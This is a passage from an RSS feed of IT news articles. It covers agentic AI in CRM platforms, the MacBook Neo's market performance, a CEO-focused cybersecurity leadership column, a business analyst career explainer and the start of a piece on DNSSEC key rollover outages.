<p class="wp-block-paragraph">The good news, says Datwani, is that AI agents themselves can <a href="https://www.cio.com/article/2140371/gen-ai-can-be-the-answer-to-your-data-problems-but-not-all-of-them.html">help clean up and organize data</a>. And vendors such as <a href="https://www.cio.com/article/4030966/snowflake-and-databricks-vie-for-the-heart-of-enterprise-ai.html">Snowflake and Databricks</a>, along with the traditional CRM powerhouses, are offering powerful data analytics solutions. “Everyone is battling for that data layer,” Datwani says.</p>



<p class="wp-block-paragraph">Forrester’s Leggett adds that CRM platforms are converging with <a href="https://www.cio.com/article/308839/top-8-customer-data-platforms.html">customer data platforms (CDPs)</a>, real-time event streams, and external data sources to create connected customer data networks. These real-time, connected data models can help organizations deliver hyper-personalization at scale.</p>



<h2 class="wp-block-heading">Agentic ushers in pricing complexity</h2>



<p class="wp-block-paragraph">The shift from license- or subscription-based pricing to an <a href="https://www.cio.com/article/3624540/how-will-ai-agents-be-priced-cios-need-to-pay-attention.html">outcome or consumption pricing model</a> has the potential to help CIOs tie their CRM costs to specific business metrics, such as the number of customer service calls resolved per hour. But it has also introduced a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">new level of complexity</a> when it comes to budgeting for CRM costs.</p>



<p class="wp-block-paragraph">For example, Chesire says ServiceNow’s CRM pricing plan starts with a baseline subscription model, and on top of that, customers get a certain number of AI tokens per user and can buy additional tokens as AI usage ramps up.</p>



<p class="wp-block-paragraph">Meanwhile, Salesforce has <a href="https://www.cio.com/article/4189183/salesforce-unveils-ai-help-agent-with-pay-per-resolution-pricing.html">rolled out pay-per-resolution pricing</a> with its recently unveiled AI Help Agent and last month <a href="https://www.cio.com/article/4183667/salesforce-to-acquire-usage-based-billing-specialist-m3ter.html">acquired usage-based billing specialist m3ter</a>. Oracle is also <a href="https://www.cio.com/article/4184271/oracle-wades-into-outcome-based-ai-billing-waters.html">piloting outcome-based AI pricing</a>.</p>



<p class="wp-block-paragraph">All these approaches undercut the predictability of the subscription model, which will complicate CIOs’ cost calculus, Deloitte’s Datwani says. “Now, as you start to think about consumption and tokens, costs might look different. As folks are opening up the architecture with things like headless CRM, what will the cost model look like for API calls or MCP server calls? So, there’s many more variables,” he adds.</p>



<h2 class="wp-block-heading">The rise of multi-agent orchestration</h2>



<p class="wp-block-paragraph">To act autonomously, agents need to access multiple data sets and software platforms seamlessly. As a result, the proliferation of agents, some embedded within specific vendor platforms and some created in-house, is going to require an orchestration layer, Futurum’s Kirkpatrick says.</p>



<p class="wp-block-paragraph">He points out that organizations need to monitor and manage agents, enforcing the same type of policy-based access control that exists for people. Organizations also need to set limits on what domains a specific agent can get into, what types of data they can access, what lines can’t they cross.</p>



<p class="wp-block-paragraph">Kirkpatrick predicts that a <a href="https://www.cio.com/article/4138739/21-agent-orchestration-tools-for-managing-your-ai-fleet.html">new class of orchestration tools</a> will emerge, although it’s not clear whether that orchestration layer will be provided by the leading CRM vendors, hyperscalers, or third parties.</p>



<p class="wp-block-paragraph">Datwani agrees. “The orchestration layer is an interesting area, where the traditional vendors are in on it, the hyperscalers are also offering it, and there are third parties. It’s my belief that there’s not going to be a clear winner.”<em></em></p>



<h2 class="wp-block-heading">The interface becomes conversational</h2>



<p class="wp-block-paragraph">Enterprise users who have traditionally had to manually wrangle with CRM systems are likely to find the ability to employ voice commands using a natural language interface to be a game changer. For starters, a salesperson can say, “I have a meeting today with Customer X. Help me prepare.” The agent will collect relevant data, ingest it, and provide a summary with recommendations.</p>



<p class="wp-block-paragraph">ServiceNow’s Chesire says voice-enabled CRM systems have an “almost magical” ability to record, transcribe, and understand the content of a call between a salesperson and a customer or potential customer. The system can then “build a quote” based on that conversation.</p>



<p class="wp-block-paragraph">On the customer service side of the equation, AI-driven voice technology enables customers to speak to an AI agent, describe the problem using natural language, and get a response. The agent has the capability to, for example, solve a credit card dispute, order a replacement product, send out a service rep, or do whatever is needed to resolve the issue, says Chesire.</p>



<p class="wp-block-paragraph">Beyond that, agentic technology is capable of understanding the underlying business process flaws that led to the product snafu, and make recommendations for ways to fix whatever led to the issue in the first place, he adds.</p>



<h2 class="wp-block-heading">Agentic drives business process transformation</h2>



<p class="wp-block-paragraph">With the emergence of outcome-based pricing, organizations are taking a fresh look at how they measure the benefits of CRM systems. That conversation is leading to an even more important analysis of underlying business processes. Or, as Constellation’s Miller says, “The old adage of applying new technology to old processes only gets you more expensive old processes.”</p>



<p class="wp-block-paragraph">“When we survey customers, we hear time and time again that the reason why they want to apply AI into their organizations is to foster exponential opportunity and exponential growth,” she says. “How do we get there with CRM has started to become the new conversation.”</p>



<p class="wp-block-paragraph">According to Miller, AI systems breach the walls of siloed data and can take a fresh look at legacy workflows. They also don’t get sucked into turf wars between marketing and sales teams. As a result, they often recommend new actions that can lead to better processes. “I think it’s starting to happen. You’re starting to see applications where AI is beginning to accelerate decision-making and decision velocity,” she says.</p>



<p class="wp-block-paragraph">“The next phase of maturity is going to be, how do we start to spread AI across our platforms so that we are seeing that holistic end-to-end relationship that we have always wanted to optimize. How do we thread that across platforms and across solutions. We’re starting to see organizations on the leading edge really start to pull those strategies together,” says Miller.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacBook Neo’s success wasn’t luck, it was a plan]]></title>
<description><![CDATA[It’s difficult to ignore the fact that Apple seems to have turned its MacBook Neo into a weapon to promote platform growth, with enough performance under the hood to make competitors seem inferior.



And even as the PC industry moves to try to compete with Apple’s last huge Mac success, the comp...]]></description>
<link>https://tsecurity.de/de/3693115/it-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693115/it-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</guid>
<pubDate>Sat, 25 Jul 2026 06:47:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s difficult to ignore the fact that Apple seems to have <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">turned its MacBook Neo into a weapon</a> to promote platform growth, with enough performance under the hood to make competitors seem inferior.</p>



<p class="wp-block-paragraph">And even as the PC industry moves to try to compete with Apple’s last <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">huge Mac success</a>, the company is already planning a powerful follow-up.</p>



<p class="wp-block-paragraph">That points to the discipline Apple has applied to the Mac since the introduction of Apple Silicon. The company has built a clear product roadmap, strong entry-level pricing, and steady performance gains. This focus is now paying dividends, giving people the impetus to keep placing their trust in Apple and its Macs — even as the industry raises prices in the face of RAMageddon and price increases. </p>



<h2 class="wp-block-heading"><strong>The numbers don’t lie</strong></h2>



<p class="wp-block-paragraph">“Apple’s recent price increase seems to be an inevitable response to these cost increases. In the second half of the year, other PC OEMs are expected to continue to raise prices, and the overall ASP increase is expected to continue,” <a href="https://counterpointresearch.com/en/insights/global-pc-shipments-decline-q2-2026-memory-crisis" data-type="link" data-id="https://counterpointresearch.com/en/insights/global-pc-shipments-decline-q2-2026-memory-crisis" target="_blank" rel="noreferrer noopener">Counterpoint said in a post Wednesday</a>. The researcher tells us global PC shipments shrank 4% in the second quarter of 2026 as rising costs hit demand. The Mac maker, by contrast, moved in the opposite direction, generating 13% growth in the quarter — mainly on the back of the MacBook Neo introduction. </p>



<p class="wp-block-paragraph"><a href="https://www.idc.com/resource-center/press-releases/2q26-pc-top5/" target="_blank">Recent IDC data</a> gives Apple 10.1% year-over-year growth and just under 10% (9.9% to be exact) of the worldwide PC market, even as the overall market declined 4.9%.</p>



<p class="wp-block-paragraph">“With emerging supply chain and tariff challenges inflating memory prices…, Apple’s incredibly aggressive price-point for the MacBook Neo makes its release feel all the more like a gut punch to one of the PC market’s most valuable price tiers,” Futurum Research Director <a href="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html" data-type="link" data-id="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html">Olivier Blanchard said when the Neo was released</a>. </p>



<h2 class="wp-block-heading"><strong>Neo 2.0 is already coming</strong></h2>



<p class="wp-block-paragraph">In the immediate future, as competitors raise prices on the PCs that compete with Apple’s lower-cost device, Cupertino is <a href="https://www.culpium.com/p/apple-in-talks-to-boost-mac-neo-production" target="_blank" rel="noreferrer noopener">already plotting</a> the path toward <a href="https://www.bloomberg.com/news/articles/2026-07-22/apple-to-launch-new-macbook-air-imac-macbook-pro-neo-mac-mini-mac-studio" target="_blank" rel="noreferrer noopener">MacBook Neo 2.</a> Reports claim this will debut in March in new colors and use the A19 Pro chip from the iPhone 17 Pro, with performance boosted by slightly more unified memory (12GB, rather than 8GB). That’ll make it a much better Mac, likely with 10-15% performance gains and the ability to run Apple Intelligence, making it the best and most affordable AI PC in its class.</p>



<p class="wp-block-paragraph">Just four months after the Neo’s rollout, Apple is already in position to leak rumors of an even more computationally capable follow-up, while competitors struggle to compete with the original on performance, build quality, and price. Still, the Neo might get more expensive, reporting warns, with the lowest-price 256GB model now gone, making the $599 Mac a mirage we can only wistfully hope to see again. </p>



<p class="wp-block-paragraph">That might matter less in context, as PC makers everywhere boost prices while RAM, chips, and storage prices head north, along with transport, logistics, and energy costs. “While [Apple] did raise prices in line with the broader market, it still remains well positioned against rivals facing the same cost pressures,” said Jean Philippe Bouchard, vice president for consumer devices at IDC. </p>



<p class="wp-block-paragraph">“As market conditions continue to worsen, the importance of supply chain management and capabilities are increasingly important,” Bouchard said. “The largest vendors, with their buying power and long-standing supplier ties, are best positioned to take share from smaller rivals.”</p>



<h2 class="wp-block-heading"><strong>This was never about luck</strong></h2>



<p class="wp-block-paragraph">This isn’t solely a market take about competition, it’s about planning.</p>



<p class="wp-block-paragraph">Few in the industry seemed prepared for the massive memory price increases that hit this year. Apple clearly planned its low-cost Mac well before that happened, hoping to seize the PC market at the low-mid-range. This is precisely what it seems to have done, what it continues to do, and what it will continue to do.</p>



<p class="wp-block-paragraph">The recent reports that it has a successor planned shows the breadth of the Mac company’s strategic vision, as Apple has quite clearly sought to fully exploit the failings of Windows and the internal contradictions of a value-conscious industry in stiff competition with itself.</p>



<p class="wp-block-paragraph">With the first M-series Macs about to enter the replacement cycle, Apple has built a market it can capitalize on for at least a decade, meaning it already has a vision for PC sales that extends at least as far. That’s the kind of road map corporate purchasers want when they make platform deployment decisions, which is why Apple’s 10% share gains are the beginning of <a href="https://www.computerworld.com/article/4150717/hexnode-ceo-macbook-neo-forces-it-to-rethink-its-budget-laptop-strategy.html">even more significant market change</a>. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[3 cybersecurity issues that should keep every CEO awake at night]]></title>
<description><![CDATA[For years, I have been saying that cybersecurity is no longer a technology problem. It has become a business leadership challenge.



Yet, despite record levels of spending, ever-growing security teams, increasingly sophisticated technologies and a constant stream of new regulations, organization...]]></description>
<link>https://tsecurity.de/de/3693088/it-nachrichten/3-cybersecurity-issues-that-should-keep-every-ceo-awake-at-night/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693088/it-nachrichten/3-cybersecurity-issues-that-should-keep-every-ceo-awake-at-night/</guid>
<pubDate>Sat, 25 Jul 2026 06:16:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, I have been saying that cybersecurity is no longer a technology problem. It has become a business leadership challenge.</p>



<p class="wp-block-paragraph">Yet, despite record levels of spending, ever-growing security teams, increasingly sophisticated technologies and a constant stream of new regulations, organizations continue to suffer major cyber incidents with alarming regularity. Every week seems to bring news of another ransomware attack, supply chain compromise or data breach affecting organizations that many would have assumed were well protected.</p>



<p class="wp-block-paragraph">The obvious conclusion is that we are asking the wrong questions.</p>



<p class="wp-block-paragraph">Too many executive teams remain preoccupied with the latest threat actor, the newest security product the CISO wants to buy or the latest vulnerability making headlines. Those issues matter, but they are not what should be keeping CEOs awake at night.</p>



<p class="wp-block-paragraph">In my view, there are three far more fundamental issues that deserve the attention of every chief executive.</p>



<h2 class="wp-block-heading">1. Corporate complexity, and the widening gap between business leadership and cybersecurity reality</h2>



<p class="wp-block-paragraph">Perhaps the biggest cybersecurity risk facing large organizations today is not technical at all.</p>



<p class="wp-block-paragraph">It is the growing disconnect between executive perception and operational reality.</p>



<p class="wp-block-paragraph">Many boards genuinely believe their organizations are reasonably well protected. They receive regular dashboards showing improving maturity scores, increasing compliance levels, falling vulnerability counts and reassuring traffic-light reports.</p>



<p class="wp-block-paragraph">Unfortunately, cyber attackers do not read dashboards.</p>



<p class="wp-block-paragraph">Behind those executive reports often lies an increasingly complex technology landscape, thousands of unmanaged digital assets, ageing infrastructure, rampant shadow IT, fragmented ownership, inconsistent governance and security teams struggling to keep pace with relentless business change.</p>



<p class="wp-block-paragraph">The problem is rarely a lack of effort.</p>



<p class="wp-block-paragraph">It is that corporate complexity has reached a level where traditional governance mechanisms are no longer capable of providing an accurate picture of organizational resilience.</p>



<p class="wp-block-paragraph">Executives believe they understand the level of cyber risk they face because they receive regular reports. Those reports often measure activity rather than resilience.</p>



<p class="wp-block-paragraph">Governance committees end up debating around another percentage point of phishing awareness or vulnerability remediation, while fundamental issues remain unaddressed in the background.</p>



<h2 class="wp-block-heading">2. Organizational inertia, and the need for executive structure to evolve faster</h2>



<p class="wp-block-paragraph">Cyber criminals continue to evolve rapidly. Large organizations generally do not.</p>



<p class="wp-block-paragraph">This is the second issue that should concern every CEO.</p>



<p class="wp-block-paragraph">Throughout my career, I have observed organizations repeatedly responding to new cyber threats by adding another technology platform, another monitoring capability, another compliance framework or another governance committee.</p>



<p class="wp-block-paragraph">Very rarely do they stop to redesign how cybersecurity operates.</p>



<p class="wp-block-paragraph">The result is what I described several years ago as the “<a href="https://www.amazon.com/Cybersecurity-Spiral-Failure-How-Break/dp/1637353057/">Cybersecurity Spiral of Failure</a>”.</p>



<ul class="wp-block-list">
<li>As complexity and regulation increase, organizations invest in more security products.</li>



<li>More products create more complexity.</li>



<li>More products and greater complexity generate more alerts.</li>



<li>More alerts require more analysts.</li>



<li>More analysts produce more reports.</li>



<li>More reports continue to build up executive confidence.</li>



<li>Meanwhile, the underlying structural weaknesses remain largely unchanged, technical debt piles up and costs escalate.</li>
</ul>



<p class="wp-block-paragraph">And when the inevitable breach eventually happens, reality reveals itself, but distrust also sets in between senior executives and security teams.</p>



<p class="wp-block-paragraph">This is not a funding problem. Nor is it a skills problem. It is fundamentally an operating model problem.</p>



<p class="wp-block-paragraph">Many organizations continue trying to solve twenty-first century challenges using governance, accountability, organizational and reporting structures designed twenty-five years ago.</p>



<p class="wp-block-paragraph">The cybersecurity function itself has evolved dramatically. Many executive structures have not.</p>



<p class="wp-block-paragraph">This organizational inertia extends beyond technology: It affects budgeting cycles, <a href="https://www.cio.com/article/4193990/reallocating-cybersecurity-capital-in-the-mythos-era.html">investment priorities</a>, procurement processes, accountability models and decision-making speed.</p>



<p class="wp-block-paragraph">Cyber attackers innovate every day. Organizational change often takes years.</p>



<p class="wp-block-paragraph">That imbalance should worry every CEO.</p>



<h2 class="wp-block-heading">3. Accelerating technological disruption, and how it challenges organizations in areas where they are intrinsically weak</h2>



<p class="wp-block-paragraph">The third issue is potentially the most significant over the coming decade.</p>



<ul class="wp-block-list">
<li>Artificial intelligence, autonomous agents and machine identities</li>



<li>Software supply chain complexity.</li>



<li>Quantum computing, and post-quantum cryptography</li>
</ul>



<p class="wp-block-paragraph">Each of these developments represents far more than another technical trend.</p>



<p class="wp-block-paragraph">Together, they fundamentally change the dynamics of cybersecurity.</p>



<p class="wp-block-paragraph">Artificial intelligence is transforming countless business processes. At the same time, it is also increasing both the speed and sophistication of cyber-attacks while simultaneously transforming defensive capabilities.</p>



<p class="wp-block-paragraph">Organizations have become increasingly dependent on software ecosystems that extend far beyond their own direct control. Engaging with the supply chain in ways that lead to a genuine appreciation of the risks involved has become a key challenge for most cybersecurity practices.</p>



<p class="wp-block-paragraph">Quantum computing may eventually invalidate much of today’s cryptographic algorithms, forcing organizations into one of the largest technology efforts since Y2K — but without the benefit of a fixed deadline and faced by a problem that is considerably more complex and hyperconnected IT estates that have little to do with those of the late 90s.</p>



<p class="wp-block-paragraph">None of these challenges can be solved overnight: They require clear governance, sustained investment over a few years and cross-functional organizational coordination.</p>



<p class="wp-block-paragraph">Most large organizations are weak on those three fronts: This is precisely why CEOs should be focusing on them now.</p>



<p class="wp-block-paragraph">Waiting until some of those risks become obvious will almost certainly be too late.</p>



<p class="wp-block-paragraph">Businesses naturally prioritise immediate commercial pressures. Cybersecurity often involves preparing for risks whose timing remains uncertain.</p>



<p class="wp-block-paragraph">But one of the greatest leadership failures I keep seeing remains the inability of organizations to act decisively on known unknowns.</p>



<p class="wp-block-paragraph">That tension explains why many organizations delay action until external events force them to respond. Unfortunately, cybersecurity rarely rewards late action.</p>



<h2 class="wp-block-heading">Leadership will determine who succeeds</h2>



<p class="wp-block-paragraph">Cybersecurity discussions still frequently focus on technology. I believe they should focus far more on leadership.</p>



<p class="wp-block-paragraph">Technology will continue evolving. Threat actors will continue adapting. Regulations will continue expanding. Those developments are inevitable.</p>



<p class="wp-block-paragraph">What remains within the control of every CEO is how their organization responds.</p>



<p class="wp-block-paragraph">Does cybersecurity remain an IT issue? Or is it recognised as an integral part of business resilience?</p>



<p class="wp-block-paragraph">How is cybersecurity accountability assigned at executive level? Or does it still rest largely with a CISO hidden in the organization?</p>



<p class="wp-block-paragraph">Does the board spend sufficient time discussing resilience? Or does cybersecurity appear only when approving budgets or reviewing incidents?</p>



<p class="wp-block-paragraph">These questions will increasingly determine organizational success.</p>



<p class="wp-block-paragraph">The companies that navigate the next decade successfully will not necessarily be those spending the most on cybersecurity. Nor will they be those deploying the latest security technologies first.</p>



<p class="wp-block-paragraph">They will be the organizations whose leadership recognises that cybersecurity has become a permanent business capability — embedded into governance, strategy, operational decision-making and organizational culture.</p>



<p class="wp-block-paragraph">That transformation cannot be delegated. It begins with the CEO.</p>



<p class="wp-block-paragraph">And perhaps that is the single biggest issue that should keep every chief executive awake at night: Not when the next cyber-attack will happen, but whether their organization is evolving quickly enough on those matters to meet a threat landscape that is changing much faster than the business itself.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is a business analyst? A key role for business-IT efficiency]]></title>
<description><![CDATA[What is a business analyst?



Business analysts (BAs) are responsible for bridging the gap between IT and the business using data analytics to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.



BAs engage with business...]]></description>
<link>https://tsecurity.de/de/3693087/it-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693087/it-nachrichten/what-is-a-business-analyst-a-key-role-for-business-it-efficiency/</guid>
<pubDate>Sat, 25 Jul 2026 06:16:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">What is a business analyst?</h2>



<p class="wp-block-paragraph">Business analysts (BAs) are responsible for bridging the gap between IT and the business using <a href="https://www.cio.com/article/191313/what-is-data-analytics-analyzing-and-managing-data-for-decisions.html">data analytics</a> to assess processes, determine requirements, and deliver data-driven recommendations and reports to executives and stakeholders.</p>



<p class="wp-block-paragraph">BAs engage with business leaders and users to understand how data-driven changes to process, products, services, software, and hardware can improve efficiencies and add value. They must articulate those ideas but also balance them against what’s technologically feasible and financially and functionally reasonable. Depending on the role, a business analyst might work with data sets to improve products, hardware, tools, software, services, or process.</p>



<p class="wp-block-paragraph">The International Institute of Business Analysis (IIBA), a nonprofit professional association, considers the business analyst an agent of change, and says that <a href="https://www.cio.com/article/191157/what-is-business-analytics-using-data-to-predict-business-outcomes.html">business analysis</a> is a disciplined approach to introduce and manage change to organizations, whether they’re for-profit businesses, governments, or nonprofits.</p>



<h2 class="wp-block-heading">Impact of AI on business analyst role</h2>



<p class="wp-block-paragraph">As AI becomes commonplace in the tech industry, business analysts are embracing it as a tool to automate repetitive work in the role. AI tools can be used for workflow and diagramming, process mapping, data analysis, and to automate meeting minutes and transcribe meetings where requirements are established, all designed to speed up the process of analyzing data, creating visuals, and transcribing and writing user stories and acceptance criteria.</p>



<p class="wp-block-paragraph">AI tools can also help identify patterns, insights, and unique data points that might go unnoticed by humans, and allow a faster time to generate insights for organizations.</p>



<p class="wp-block-paragraph">Of course, as with all AI tools, they still require humans to oversee prompts, scripting, and evaluate AI outputs to ensure they’re accurate and valid. While they can’t replace the work of BAs, AI can help them spend more time on thoughtful analysis and decision making, rather than mundane tasks such as gathering and summarizing data, and querying.</p>



<h2 class="wp-block-heading">Business analyst job description</h2>



<p class="wp-block-paragraph">BAs are responsible for creating new models that support business decisions by working closely with finance and IT teams to establish initiatives and strategies aimed at improving revenue and optimizing costs. They need a strong understanding of regulatory and reporting requirements, and have plenty of experience in forecasting, budgeting, and financial analysis combined with knowing KPIs, according to Robert Half Technology.</p>



<p class="wp-block-paragraph">According to Robert Half, a BA’s job description typically includes budgeting and forecasting, planning and monitoring, variance analysis, pricing, reporting, and creating a detailed business analysis in an effort to outline problems, opportunities, and solutions for a business. It also says BAs should be able to define business requirements and report them back to stakeholders.</p>



<p class="wp-block-paragraph">Since BAs are tasked with prioritizing technical and functional requirements, identifying what clients want, and determining what’s feasible to deliver, the role requires a deep understanding of systems, how they function, who’ll need to be involved, and the necessary steps to get everyone on board.  </p>



<p class="wp-block-paragraph">The role is constantly evolving, especially as companies rely more on data to advise business operations. Every company has different issues that a business analyst can address, whether it’s dealing with outdated legacy systems, changing technologies, broken processes, poor client or customer satisfaction, or large, siloed organizations.</p>



<h2 class="wp-block-heading">Business analyst skills</h2>



<p class="wp-block-paragraph">The BA position requires both hard and soft skills, as they need to know how to pull, analyze, and report data trends, share that information with others, and apply it to business goals and needs.</p>



<p class="wp-block-paragraph">Not all BAs need a background in IT if they have a general understanding of how systems, products, and tools work. Alternatively, some have strong IT backgrounds and less experience in business, but are interested in shifting away from IT into this hybrid role, which often acts as a communicator between the business and IT sides of the organization. So having extensive experience in either area can be beneficial for BAs.</p>



<p class="wp-block-paragraph"><a href="https://www.iiba.org/career-resources/new-to-business-analysis/" target="_blank" rel="noreferrer noopener">According to the IIBA</a>, some of the most important skills and experience for a business analyst are:</p>



<ul class="wp-block-list">
<li>Oral and written communication skills</li>



<li>Interpersonal, organizational, facilitation, and consultative skills</li>



<li>Analytical thinking and problem solving</li>



<li>Being detail-oriented and able to deliver a high level of accuracy</li>



<li>Knowledge of business structure</li>



<li>Stakeholder and cost-benefit analysis</li>



<li>Processes modeling</li>



<li>Understanding networks, databases, and other technologies</li>
</ul>



<p class="wp-block-paragraph">For a more in-depth look at what it takes to succeed as a business analyst, click <a href="https://www.cio.com/article/189108/essential-traits-of-elite-business-analysts.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst salary</h2>



<p class="wp-block-paragraph">The average annual salary for an IT business analyst is $80,692, according to <a href="https://www.payscale.com/research/US/Job=Business_Analyst%2C_IT/Salary" target="_blank" rel="noreferrer noopener">data from PayScale</a>. The highest paid BAs are in New York, where the average salary is 14% higher than the national average. Dallas, Texas, is second, with reported salaries 6.4% higher than the national average, closely followed by Washington, D.C., where salaries are 6.3% higher than the national average.</p>



<p class="wp-block-paragraph">Some skills are in higher demand than others, with the potential to boost salary. According to Payscale, these are associated with higher BA salaries. These skills, and the amount they can boost your salary, include:</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td>Skills</td><td>Salary Boost</td></tr><tr><td>ScrumMaster</td><td>44%</td></tr><tr><td>Microsoft Azure</td><td>30%</td></tr><tr><td>Supply Chain</td><td>27%</td></tr><tr><td>Oracle eBusiness Suite</td><td>25%</td></tr><tr><td>Master Data Management (SAP MDM)</td><td>24%</td></tr><tr><td>SAP Sales and Distribution (SAP SD)</td><td>24%</td></tr><tr><td>Product Support</td><td>18%</td></tr><tr><td>Microsoft Dynamics GP</td><td>18%</td></tr><tr><td>SAP Quality Management (SAP QM)</td><td>18%</td></tr><tr><td>Workday Software</td><td>15%</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph">For tips on boosting your salary, click <a href="https://www.cio.com/article/189510/7-steps-business-analysts-can-take-to-earn-more.html">here</a>.</p>



<h2 class="wp-block-heading">Business analyst certifications</h2>



<p class="wp-block-paragraph">Although business analysis is a relatively new discipline in IT, a handful of organizations already offer certifications to help boost your résumé and prove your merit as an analyst. Organizations such as the IIBA, IQBBA, IREB, and PMI each offer their own tailored certifications for business analysis. These include:</p>



<ul class="wp-block-list">
<li>IIBA <a href="https://www.cio.com/article/189169/ecba-certification-an-entry-level-credential-for-business-analysts.html">Entry Certificate in Business Analysis (ECBA)</a></li>



<li>IIBA Certification of Competency in Business Analysis (CCBA)</li>



<li>IIBA Certified Business Analysis Professional (CBAP)</li>



<li>IIBA Agile Analysis Certification (AAC)</li>



<li>IQBBA Certified Foundation Level Business Analyst (CFLBA)</li>



<li>IREB Certified Professional for Requirements Engineering (CPRE)</li>



<li>PMI Professional in Business Analysis (PBA)</li>



<li>Certified Analytics Professional (CAP)</li>
</ul>



<p class="wp-block-paragraph">For more information about how to earn one of these certifications — and how much they cost — click <a href="https://www.cio.com/article/228834/6-business-analyst-certifications-to-advance-your-analytics-career.html">here</a>.</p>



<h2 class="wp-block-heading">Business analytics tools and software</h2>



<p class="wp-block-paragraph">BAs typically rely on software such as Microsoft’s Excel, PowerPoint, and Access, as well as SQL, Google Analytics, and Tableau. These tools help BAs collect and sort data, create graphs, write documents, and design visualizations to explain findings. You won’t necessarily need programming or database skills for a BA position, but if you already have these skills, they won’t hurt. The type of software and tools you’ll need to use, however, will depend on your job title and what the organization requires.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Sat, 25 Jul 2026 06:16:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



